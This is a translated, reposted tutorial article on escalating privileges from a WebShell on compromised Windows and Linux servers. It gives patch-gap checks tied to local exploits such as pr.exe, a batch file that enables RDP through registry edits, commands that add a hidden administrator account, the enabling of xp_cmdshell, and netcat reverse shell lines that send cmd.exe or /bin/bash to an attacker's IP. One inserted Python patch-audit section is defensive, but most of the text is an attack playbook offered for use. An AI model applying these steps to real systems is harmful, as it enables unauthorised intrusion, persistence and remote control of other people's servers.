2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Today I will talk about privilege escalation based on a WebShell, a topic that many people may not understand well. To help you understand it better, the editor has summarized the following content; I hope you get something from this article.
I. Privilege escalation based on WebShell
1. Access the large webshell ("big horse", 大马) to view the current permissions
http://192.168.1.147/dm.asp
2. If access is denied, upload an aspx webshell instead; its permissions are relatively large.
http://192.168.1.147/da.aspx
II. Windows privilege escalation
1. Check the patch status of the system.
Win2003:
systeminfo > C:\Windows\Temp\temp.txt & (for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt | @find /I "%i" || @echo %i Not Installed!) & del /f /q /a C:\Windows\Temp\temp.txt
General-purpose:
systeminfo > C:\Windows\Temp\temp.txt & (for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:\Windows\Temp\temp.txt | @find /I "%i" || @echo %i Not Installed!) & del /f /q /a C:\Windows\Temp\temp.txt
2. Patch comparison table; upload the corresponding exe and execute the command
KB952004: MS09-012 (PR)
KB956572: MS09-012 (Churrasco, "Brazilian barbecue")
KB2393802: MS11-011
KB2592799: MS11-0801
KB2621440: MS12-0203
KB2160329: MS10-048
KB970483: MS09-020 (IIS6 privilege escalation, possibly)
KB2124261, KB2271195: MS10-065 (IIS7 privilege escalation, possibly)
KB977165: MS10-015
KB2360937: MS10-084
KB2478960: MS11-014
KB2507938: MS11-056
KB2566454: MS11-062
KB2646524: MS12-003
KB2645640: MS12-009
KB2641653: MS12-018
KB3077657: MS15-077 (font driver privilege escalation)
KB944653: MS07-067
KB971657: MS09-041
KB2620712: MS11-097
KB942831: MS08-005
KB2503665: MS11-046
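The check in steps 1 and 2 above, rewritten as a small patch-audit script (an added example, not code from the original post): it reads saved systeminfo output, extracts the installed KB numbers as whole tokens rather than the substring match that find /I does, and reports which entries of the comparison table are still missing. The KB-to-bulletin table is a subset copied from above, and the systeminfo text is constructed sample data.

```python
import re

# Subset of the comparison table above: hotfix KB -> security bulletin.
KB_TO_BULLETIN = {
    "KB952004": "MS09-012", "KB956572": "MS09-012", "KB2393802": "MS11-011",
    "KB2160329": "MS10-048", "KB977165": "MS10-015", "KB2360937": "MS10-084",
    "KB2478960": "MS11-014", "KB2507938": "MS11-056", "KB2566454": "MS11-062",
    "KB2646524": "MS12-003", "KB2645640": "MS12-009", "KB2641653": "MS12-018",
    "KB944653": "MS07-067", "KB971657": "MS09-041", "KB2620712": "MS11-097",
    "KB942831": "MS08-005", "KB2503665": "MS11-046", "KB3077657": "MS15-077",
}

# Constructed sample of the Hotfix(s) section of `systeminfo` output.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WEB01
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB944653
                           [02]: KB952004
                           [03]: KB2393802
                           [04]: KB2503665
"""

# Whole-token match: KB944653 must not satisfy a check for KB94465.
HOTFIX_RE = re.compile(r"\bKB\d+\b", re.IGNORECASE)


def installed_hotfixes(systeminfo_text):
    """Return the set of KB identifiers listed in systeminfo output."""
    return {kb.upper() for kb in HOTFIX_RE.findall(systeminfo_text)}


def missing_patches(systeminfo_text, table=KB_TO_BULLETIN):
    """Return {KB: bulletin} for every table entry not present in the host's hotfix list."""
    have = installed_hotfixes(systeminfo_text)
    return {kb: ms for kb, ms in table.items() if kb not in have}


def report(systeminfo_text, table=KB_TO_BULLETIN):
    """One line per missing hotfix, sorted by bulletin, in the spirit of the `echo %i Not Installed!` output."""
    missing = missing_patches(systeminfo_text, table)
    return [f"{ms} {kb} Not Installed!" for kb, ms in sorted(missing.items(), key=lambda kv: kv[1])]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SYSTEMINFO)))
```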
3. For the PR privilege escalation vulnerability, upload pr.exe and execute it.
4. Generally speaking, the following directories have read and write permissions:
log, cache, Recycle Bin, and the webshell's own directory
5. Open 3389 from the command line
Create a new bat file, enter the following, and upload it to the appropriate directory
echo Windows Registry Editor Version 5.00 >> 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 3389.reg
echo "fDenyTSConnections"=dword:00000000 >> 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg
echo "PortNumber"=dword:00000d3d >> 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg
echo "PortNumber"=dword:00000d3d >> 3389.reg
regedit /s 3389.reg
del 3389.reg
Command line execution
/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"
2. Open port 3389 with tools
3. Create a user and add it to the administrators group
net user abc 123 /add
net localgroup administrators abc /add
III. Database privilege escalation
Method: enable XP_CMDSHELL, then create a new query
IV. Reverse shell
1. Forward connection: we actively connect to the server, and the server opens the corresponding port
2. Reverse connection: the server actively connects to us, and we listen on a certain port
Attacker machine: nc -lvvp 1234
Webshell: nc.exe -e cmd.exe 192.168.1.133 (attacker machine IP) 1234
3. Obtain the shell
4. Linux system: nc -e /bin/bash <attacker machine IP> 1234
After reading the above, do you have a better understanding of WebShell-based privilege escalation? If you want to learn more, please follow the industry information channel. Thank you for your support.